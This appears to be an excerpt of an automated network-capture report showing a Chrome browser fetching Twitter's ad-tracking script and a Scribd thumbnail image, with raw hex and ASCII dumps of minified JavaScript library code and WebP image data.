                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: {"bakers":[]}


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        63192.168.2.1649797151.101.120.1574436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:32 UTC352OUTGET /uwt.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: static.ads-twitter.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:32 UTC543INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 58876
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 29 Oct 2024 01:22:31 GMT
                                                                                                                                                                                                                                                                                                                                                                                        ETag: "4328e910de583ad53b3a7a76455af005"
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:32 GMT
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-iad-kiad7000145-IAD, cache-cdg-lfpb1150069-CDG
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT, HIT
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding,Host
                                                                                                                                                                                                                                                                                                                                                                                        P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"
                                                                                                                                                                                                                                                                                                                                                                                        x-tw-cdn: FT
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:32 UTC1378INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 7b 36 31 37 33 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 72 3b 74 2e 65 78 70 6f 72 74 73 3d 28 72 3d 72 7c 7c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 72 3b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 26 26 28 72 3d 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2e 63 72 79 70 74 6f 26 26 28 72 3d 73 65 6c 66 2e 63 72 79 70 74 6f 29 2c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 26 26 28 72 3d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: !function(){var t={6173:function(t,e,n){var r;t.exports=(r=r||function(t,e){var r;if("undefined"!=typeof window&&window.crypto&&(r=window.crypto),"undefined"!=typeof self&&self.crypto&&(r=self.crypto),"undefined"!=typeof globalThis&&globalThis.crypto&&(r=
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:32 UTC1378INData Raw: 74 68 69 73 2e 77 6f 72 64 73 3d 74 7c 7c 5b 5d 2c 74 68 69 73 2e 73 69 67 42 79 74 65 73 3d 6e 75 6c 6c 21 3d 65 3f 65 3a 34 2a 74 2e 6c 65 6e 67 74 68 7d 2c 74 6f 53 74 72 69 6e 67 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 28 74 7c 7c 66 29 2e 73 74 72 69 6e 67 69 66 79 28 74 68 69 73 29 7d 2c 63 6f 6e 63 61 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 77 6f 72 64 73 2c 6e 3d 74 2e 77 6f 72 64 73 2c 72 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 2c 69 3d 74 2e 73 69 67 42 79 74 65 73 3b 69 66 28 74 68 69 73 2e 63 6c 61 6d 70 28 29 2c 72 25 34 29 66 6f 72 28 76 61 72 20 6f 3d 30 3b 6f 3c 69 3b 6f 2b 2b 29 7b 76 61 72 20 61 3d 6e 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 72 2b 6f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: this.words=t||[],this.sigBytes=null!=e?e:4*t.length},toString:function(t){return(t||f).stringify(this)},concat:function(t){var e=this.words,n=t.words,r=this.sigBytes,i=t.sigBytes;if(this.clamp(),r%4)for(var o=0;o<i;o++){var a=n[o>>>2]>>>24-o%4*8&255;e[r+o
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:32 UTC1378INData Raw: 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 64 2e 70 61 72 73 65 28 75 6e 65 73 63 61 70 65 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 74 29 29 29 7d 7d 2c 70 3d 63 2e 42 75 66 66 65 72 65 64 42 6c 6f 63 6b 41 6c 67 6f 72 69 74 68 6d 3d 75 2e 65 78 74 65 6e 64 28 7b 72 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 64 61 74 61 3d 6e 65 77 20 73 2e 69 6e 69 74 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 3d 30 7d 2c 5f 61 70 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 68 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ion(t){return d.parse(unescape(encodeURIComponent(t)))}},p=c.BufferedBlockAlgorithm=u.extend({reset:function(){this._data=new s.init,this._nDataBytes=0},_append:function(t){"string"==typeof t&&(t=h.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigByt
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:32 UTC1378INData Raw: 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 65 28 72 29 26 26 28 69 3c 38 26 26 28 63 5b 69 5d 3d 6e 28 74 2e 70 6f 77 28 72 2c 2e 35 29 29 29 2c 75 5b 69 5d 3d 6e 28 74 2e 70 6f 77 28 72 2c 31 2f 33 29 29 2c 69 2b 2b 29 2c 72 2b 2b 7d 28 29 3b 76 61 72 20 73 3d 5b 5d 2c 6c 3d 61 2e 53 48 41 32 35 36 3d 6f 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 69 2e 69 6e 69 74 28 63 2e 73 6c 69 63 65 28 30 29 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 74 68 69 73 2e 5f 68 61 73 68 2e 77 6f 72 64 73 2c 72 3d 6e 5b 30 5d 2c 69 3d 6e 5b 31 5d 2c 6f 3d 6e 5b 32 5d 2c 61 3d 6e 5b 33
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: r(var r=2,i=0;i<64;)e(r)&&(i<8&&(c[i]=n(t.pow(r,.5))),u[i]=n(t.pow(r,1/3)),i++),r++}();var s=[],l=a.SHA256=o.extend({_doReset:function(){this._hash=new i.init(c.slice(0))},_doProcessBlock:function(t,e){for(var n=this._hash.words,r=n[0],i=n[1],o=n[2],a=n[3
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:32 UTC1378INData Raw: 72 20 69 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 74 68 69 73 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 69 66 28 21 74 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 6e 28 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 74 79 70 65 6f 66 20 74 2b 22 20 22 2b 74 2b 22 20 69 73 20 6e 6f 74 20 69 74 65 72 61 62 6c 65 28 63 61 6e 6e 6f 74 20 72 65 61 64 20 70 72 6f 70 65 72 74 79 20 53 79 6d 62 6f 6c 28 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 29 29 22 29 29 3b 76 61 72 20 72 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 74 29 3b 69 66 28 30 3d 3d 3d 72 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 65 28 5b 5d 29 3b 76 61 72 20 69 3d 72 2e 6c 65 6e 67 74
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: r i=function(t){return new this((function(e,n){if(!t||void 0===t.length)return n(new TypeError(typeof t+" "+t+" is not iterable(cannot read property Symbol(Symbol.iterator))"));var r=Array.prototype.slice.call(t);if(0===r.length)return e([]);var i=r.lengt
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:32 UTC1378INData Raw: 76 6f 69 64 20 64 28 74 29 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6e 29 72 65 74 75 72 6e 20 76 6f 69 64 20 70 28 28 72 3d 6e 2c 69 3d 65 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 2e 61 70 70 6c 79 28 69 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2c 74 29 7d 74 2e 5f 73 74 61 74 65 3d 31 2c 74 2e 5f 76 61 6c 75 65 3d 65 2c 64 28 74 29 7d 63 61 74 63 68 28 65 29 7b 66 28 74 2c 65 29 7d 76 61 72 20 72 2c 69 7d 66 75 6e 63 74 69 6f 6e 20 66 28 74 2c 65 29 7b 74 2e 5f 73 74 61 74 65 3d 32 2c 74 2e 5f 76 61 6c 75 65 3d 65 2c 64 28 74 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28 74 29 7b 32 3d 3d 3d 74 2e 5f 73 74 61 74 65 26 26 30 3d 3d 3d 74 2e 5f 64 65 66 65 72 72 65 64 73 2e 6c 65 6e 67 74 68 26 26 75 2e 5f 69 6d 6d 65 64 69 61 74 65 46 6e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: void d(t);if("function"==typeof n)return void p((r=n,i=e,function(){r.apply(i,arguments)}),t)}t._state=1,t._value=e,d(t)}catch(e){f(t,e)}var r,i}function f(t,e){t._state=2,t._value=e,d(t)}function d(t){2===t._state&&0===t._deferreds.length&&u._immediateFn
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:32 UTC1378INData Raw: 74 75 72 6e 20 6e 65 77 20 75 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 6e 28 74 29 7d 29 29 7d 2c 75 2e 72 61 63 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 75 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 69 66 28 21 61 28 74 29 29 72 65 74 75 72 6e 20 6e 28 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 50 72 6f 6d 69 73 65 2e 72 61 63 65 20 61 63 63 65 70 74 73 20 61 6e 20 61 72 72 61 79 22 29 29 3b 66 6f 72 28 76 61 72 20 72 3d 30 2c 69 3d 74 2e 6c 65 6e 67 74 68 3b 72 3c 69 3b 72 2b 2b 29 75 2e 72 65 73 6f 6c 76 65 28 74 5b 72 5d 29 2e 74 68 65 6e 28 65 2c 6e 29 7d 29 29 7d 2c 75 2e 5f 69 6d 6d 65 64 69 61 74 65 46 6e 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 73 65 74 49 6d 6d 65 64 69 61 74 65
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: turn new u((function(e,n){n(t)}))},u.race=function(t){return new u((function(e,n){if(!a(t))return n(new TypeError("Promise.race accepts an array"));for(var r=0,i=t.length;r<i;r++)u.resolve(t[r]).then(e,n)}))},u._immediateFn="function"==typeof setImmediate
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:32 UTC1378INData Raw: 68 72 6f 77 22 3d 3d 3d 69 29 74 68 72 6f 77 20 6f 3b 72 65 74 75 72 6e 20 43 28 29 7d 66 6f 72 28 6e 2e 6d 65 74 68 6f 64 3d 69 2c 6e 2e 61 72 67 3d 6f 3b 3b 29 7b 76 61 72 20 61 3d 6e 2e 64 65 6c 65 67 61 74 65 3b 69 66 28 61 29 7b 76 61 72 20 63 3d 67 28 61 2c 6e 29 3b 69 66 28 63 29 7b 69 66 28 63 3d 3d 3d 6c 29 63 6f 6e 74 69 6e 75 65 3b 72 65 74 75 72 6e 20 63 7d 7d 69 66 28 22 6e 65 78 74 22 3d 3d 3d 6e 2e 6d 65 74 68 6f 64 29 6e 2e 73 65 6e 74 3d 6e 2e 5f 73 65 6e 74 3d 6e 2e 61 72 67 3b 65 6c 73 65 20 69 66 28 22 74 68 72 6f 77 22 3d 3d 3d 6e 2e 6d 65 74 68 6f 64 29 7b 69 66 28 22 73 75 73 70 65 6e 64 65 64 53 74 61 72 74 22 3d 3d 3d 72 29 74 68 72 6f 77 20 72 3d 22 63 6f 6d 70 6c 65 74 65 64 22 2c 6e 2e 61 72 67 3b 6e 2e 64 69 73 70 61 74 63 68
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: hrow"===i)throw o;return C()}for(n.method=i,n.arg=o;;){var a=n.delegate;if(a){var c=g(a,n);if(c){if(c===l)continue;return c}}if("next"===n.method)n.sent=n._sent=n.arg;else if("throw"===n.method){if("suspendedStart"===r)throw r="completed",n.arg;n.dispatch
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:32 UTC1378INData Raw: 29 7d 28 69 2c 6f 2c 72 2c 61 29 7d 29 29 7d 72 65 74 75 72 6e 20 72 3d 72 3f 72 2e 74 68 65 6e 28 61 2c 61 29 3a 61 28 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 67 28 74 2c 65 29 7b 76 61 72 20 6e 3d 74 2e 69 74 65 72 61 74 6f 72 5b 65 2e 6d 65 74 68 6f 64 5d 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 6e 29 7b 69 66 28 65 2e 64 65 6c 65 67 61 74 65 3d 6e 75 6c 6c 2c 22 74 68 72 6f 77 22 3d 3d 3d 65 2e 6d 65 74 68 6f 64 29 7b 69 66 28 74 2e 69 74 65 72 61 74 6f 72 2e 72 65 74 75 72 6e 26 26 28 65 2e 6d 65 74 68 6f 64 3d 22 72 65 74 75 72 6e 22 2c 65 2e 61 72 67 3d 76 6f 69 64 20 30 2c 67 28 74 2c 65 29 2c 22 74 68 72 6f 77 22 3d 3d 3d 65 2e 6d 65 74 68 6f 64 29 29 72 65 74 75 72 6e 20 6c 3b 65 2e 6d 65 74 68 6f 64 3d 22 74 68 72 6f 77 22 2c 65 2e 61 72 67 3d 6e 65
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: )}(i,o,r,a)}))}return r=r?r.then(a,a):a()}}function g(t,e){var n=t.iterator[e.method];if(void 0===n){if(e.delegate=null,"throw"===e.method){if(t.iterator.return&&(e.method="return",e.arg=void 0,g(t,e),"throw"===e.method))return l;e.method="throw",e.arg=ne
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:33 UTC1378INData Raw: 61 74 6f 72 46 75 6e 63 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 72 65 74 75 72 6e 21 21 65 26 26 28 65 3d 3d 3d 64 7c 7c 22 47 65 6e 65 72 61 74 6f 72 46 75 6e 63 74 69 6f 6e 22 3d 3d 3d 28 65 2e 64 69 73 70 6c 61 79 4e 61 6d 65 7c 7c 65 2e 6e 61 6d 65 29 29 7d 2c 74 2e 6d 61 72 6b 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 2c 68 29 3a 28 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 68 2c 63 28 74 2c 61 2c 22 47 65 6e 65 72 61 74 6f 72 46 75 6e 63 74 69 6f 6e 22 29 29 2c 74 2e 70
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: atorFunction=function(t){var e="function"==typeof t&&t.constructor;return!!e&&(e===d||"GeneratorFunction"===(e.displayName||e.name))},t.mark=function(t){return Object.setPrototypeOf?Object.setPrototypeOf(t,h):(t.__proto__=h,c(t,a,"GeneratorFunction")),t.p


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        64192.168.2.1649800151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:32 UTC645OUTGET /img/word_document/335808746/149x198/ec87a4c99b/1731725376?v=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: imgv2-2-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:33 UTC778INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 5626
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=864000,stale-while-revalidate=86400,stale-if-error=86400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: image/webp
                                                                                                                                                                                                                                                                                                                                                                                        Etag: "sjh4LdhdJMJETCT0QczpnyHS29x+esodWb0uE5ZnT94"
                                                                                                                                                                                                                                                                                                                                                                                        Fastly-Io-Info: ifsz=13325 idim=149x198 ifmt=png ofsz=5626 odim=149x198 ofmt=webp
                                                                                                                                                                                                                                                                                                                                                                                        Fastly-Io-Served-By: vpop-kiad7010226
                                                                                                                                                                                                                                                                                                                                                                                        Fastly-Stats: io=1
                                                                                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        X-Envoy-Upstream-Service-Time: 112
                                                                                                                                                                                                                                                                                                                                                                                        X-Scribd-Default-Image: false
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Age: 180017
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:32 GMT
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-chi-klot8100110-CHI, cache-ewr-kewr1740025-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT, HIT
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 36, 0
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522373.870558,VS0,VE1
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:33 UTC1378INData Raw: 52 49 46 46 f2 15 00 00 57 45 42 50 56 50 38 20 e6 15 00 00 b0 56 00 9d 01 2a 95 00 c6 00 3e 6d 30 93 46 24 23 21 a1 29 32 2e 40 80 0d 89 64 01 06 01 94 7a 62 fd df ad 73 a9 7b 4f ef de 95 d6 97 f3 1e a6 1f 78 ed 3b aa bc b5 b9 fb ce 07 f8 5f d5 0f 72 5f 9d fd 80 3f 52 3a 58 79 80 fe 85 ff 3f d5 af fd bf ab 4f eb de a2 bf dd 7d 2f 3d 55 7d 04 7c ba 3d 9a ff b7 7f df ca 34 f2 c7 f6 fe d7 bf c0 78 93 e3 37 d4 1e d9 7f 61 e6 33 d4 7e 66 7f 34 fb 55 fa 6f ee bf b9 fe a9 7f 8f fc aa f3 b7 e1 8f f6 3f 69 bf 21 7f 94 7f 3e ff 2d f6 cd c3 1d ad 7f 9f fd 77 f6 05 f5 c7 e9 5f ee 3f c4 78 d6 6a 23 e1 4f f4 7f 6c 1f 60 1f ad 7e 92 ff d0 f0 b5 fb 77 fb 5f 60 4f e5 3f db 3f f3 ff 9b f7 68 fe bf ff 97 fb 0f 3f bf a2 ff aa ff d9 fe b7 e0 33 f5 ef ac d7 ee c7 b3 9f ec 02
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: RIFFWEBPVP8 V*>m0F$#!)2.@dzbs{Ox;_r_?R:Xy?O}/=U}|=4x7a3~f4Uo?i!>-w_?xj#Ol`~w_`O??h?3
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:33 UTC1378INData Raw: e3 33 db 39 31 e2 3f dd 36 f0 f2 1b 94 fb 8a 80 07 51 27 c4 15 4d 21 2a f6 12 e7 e2 3c b6 e2 c6 2d 8a ab 5f 62 36 3f 1e 8c 6f 5b d4 2b 07 aa 34 be f3 ac 71 b3 94 35 bb 12 53 64 3b c9 a8 44 cd bf c2 39 09 8e 2a 9b 6e 7d ff 84 d5 c4 9f ba 93 e5 df ae e5 b9 e1 f8 17 30 e9 55 59 12 e4 7b 76 7e 17 16 1a bc 8b 4a 7f 0e fc ab 0e c1 c8 f5 20 66 e6 88 e8 87 d9 90 6b bb fc 2d a4 c9 25 65 2b 96 2b 78 0b 64 d4 78 ed db da fe 6c 14 1d 8f fe 09 8f 68 c2 b7 d1 7b 7d a8 0c 71 2d 36 f1 70 9b b8 dd 7b 3d 63 8b 1c 52 22 13 67 78 3e 2f 41 27 b7 37 7a ee 3b d8 ea ae ed a0 34 e7 24 43 4c d4 09 c8 51 bd 46 23 11 7c a3 8c 9e 1e 86 d5 f0 44 4c 75 13 47 e9 31 e3 72 9d 6f 91 5d 82 52 24 8e 5d 33 38 55 23 cc 96 d6 9b e9 b9 d0 29 41 f6 3e b5 1d 7a e7 7c 51 e9 75 66 7c 5f 46 59 94 23
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 391?6Q'M!*<-_b6?o[+4q5Sd;D9*n}0UY{v~J fk-%e++xdxlh{}q-6p{=cR"gx>/A'7z;4$CLQF#|DLuG1ro]R$]38U#)A>z|Quf|_FY#
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:33 UTC1378INData Raw: ea 83 00 4c a6 73 07 76 ec 0c 39 2f db 34 8d bb 33 82 9b 27 30 aa 56 40 8d d9 79 a7 35 4a 20 ff d2 12 ab 3b 58 06 73 0f 8e b6 67 6a 96 ef 96 f1 e3 cd 7f 84 52 70 8a c3 16 bb 1f c1 bf e3 43 91 99 6f fa 4a ae 96 28 49 fe 1e 6d 2d d3 ed 0a 5a a7 70 71 a6 bc 74 72 4d 20 36 8d 08 c6 e3 fa bd e7 de 3c 17 30 8f 6b 11 81 4e 1e e2 32 f6 f9 50 1a a3 fe 20 96 19 37 31 c2 8f 03 29 67 15 95 06 06 1d 06 3c 92 78 31 fe 6f 37 4d a9 21 ad c6 7f 6d 47 2d d5 fd ad 03 3f ae bd 2f 1c 5b 0c 92 ea a6 a6 85 fc e3 eb 96 a6 fb 07 25 08 13 41 f4 f1 fa 64 d8 ea e5 d3 52 ce b7 f2 12 8a 1c 4b c1 2c 2a c1 14 83 df 6d d6 c9 03 6f 6e ea ce 61 0b a8 3a 6a b4 a8 02 c9 4f b2 bd 7b 1e 6b 60 1e 56 22 60 71 a2 7c a0 1f fa 85 15 0c 92 ec a5 64 c3 7e 49 a4 ad 08 99 f8 4a a6 da 2a 7d a6 85 51 1e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Lsv9/43'0V@y5J ;XsgjRpCoJ(Im-ZpqtrM 6<0kN2P 71)g<x1o7M!mG-?/[%AdRK,*mona:jO{k`V"`q|d~IJ*}Q
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:33 UTC1378INData Raw: cf 52 2b 8a b2 81 37 f6 ad c4 15 50 98 44 51 8c f7 a3 94 ee de 91 92 6e c7 29 f2 3b 3b 6b 2f b1 ef 80 27 51 04 a2 99 bb f4 0b 05 5b c0 71 fc 42 fb 37 00 ce ab ec b0 3b 82 e9 17 51 f5 b3 53 4b c4 63 15 13 57 37 dc 2a b4 fb 50 14 58 b5 24 3a df 5c e7 9f 42 c4 77 62 e9 a2 6a bf 79 3f 4e 68 2e 0e 7e c2 34 b3 1e 8b 96 db 26 a9 24 c4 69 61 62 a5 a6 f9 ce fc 6a 3a a7 4a 85 7f 52 d8 5e ee d0 72 99 7f 0d e3 92 f6 b7 15 b1 b6 86 c6 05 ef 5b 7a f9 a0 41 fe 39 7a 51 c1 a8 dc 66 fe c2 68 5f 9c f9 c0 e2 c2 b4 e2 a0 99 c2 2a 22 f9 ef 97 b5 f2 72 fe b1 73 5e 73 d0 4b 54 37 63 b9 c0 d7 d6 d2 a3 d4 1b 3a 00 ac c9 5f 0e ff a1 4a 13 9f 9f 6d 7e 68 3b b4 1e be 36 2f 44 ac 81 8f 92 09 0f 0e 32 0e a9 d1 42 19 a9 8a 36 68 1e 8d 12 fb f3 42 81 e0 ee ec 29 3e a4 c0 59 8c f9 52 98
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: R+7PDQn);;k/'Q[qB7;QSKcW7*PX$:\Bwbjy?Nh.~4&$iabj:JR^r[zA9zQfh_*"rs^sKT7c:_Jm~h;6/D2B6hB)>YR
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:33 UTC114INData Raw: c0 d2 be 0b 01 08 0d 2e 44 c0 47 03 07 a3 9b 11 0f 5d 27 dc 0b 6a 75 3d f2 ca d3 2f bd 79 c9 b2 ec 06 24 2b a0 98 d3 86 b7 0e 0e d9 01 36 0b 2f af e3 7a a4 d8 5d ba 43 4f c9 80 a7 9a 6f 4f c9 51 c5 4b 51 c3 4e 76 a1 8c f0 4b 15 e6 47 4b c0 62 2a 91 f1 7f ef 31 88 0c b4 3e 78 db c9 d8 78 13 8d f0 88 8a 12 ad 09 e7 0f 2f fa 40 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: .DG]'ju=/y$+6/z]COoOQKQNvKGKb*1>xx/@


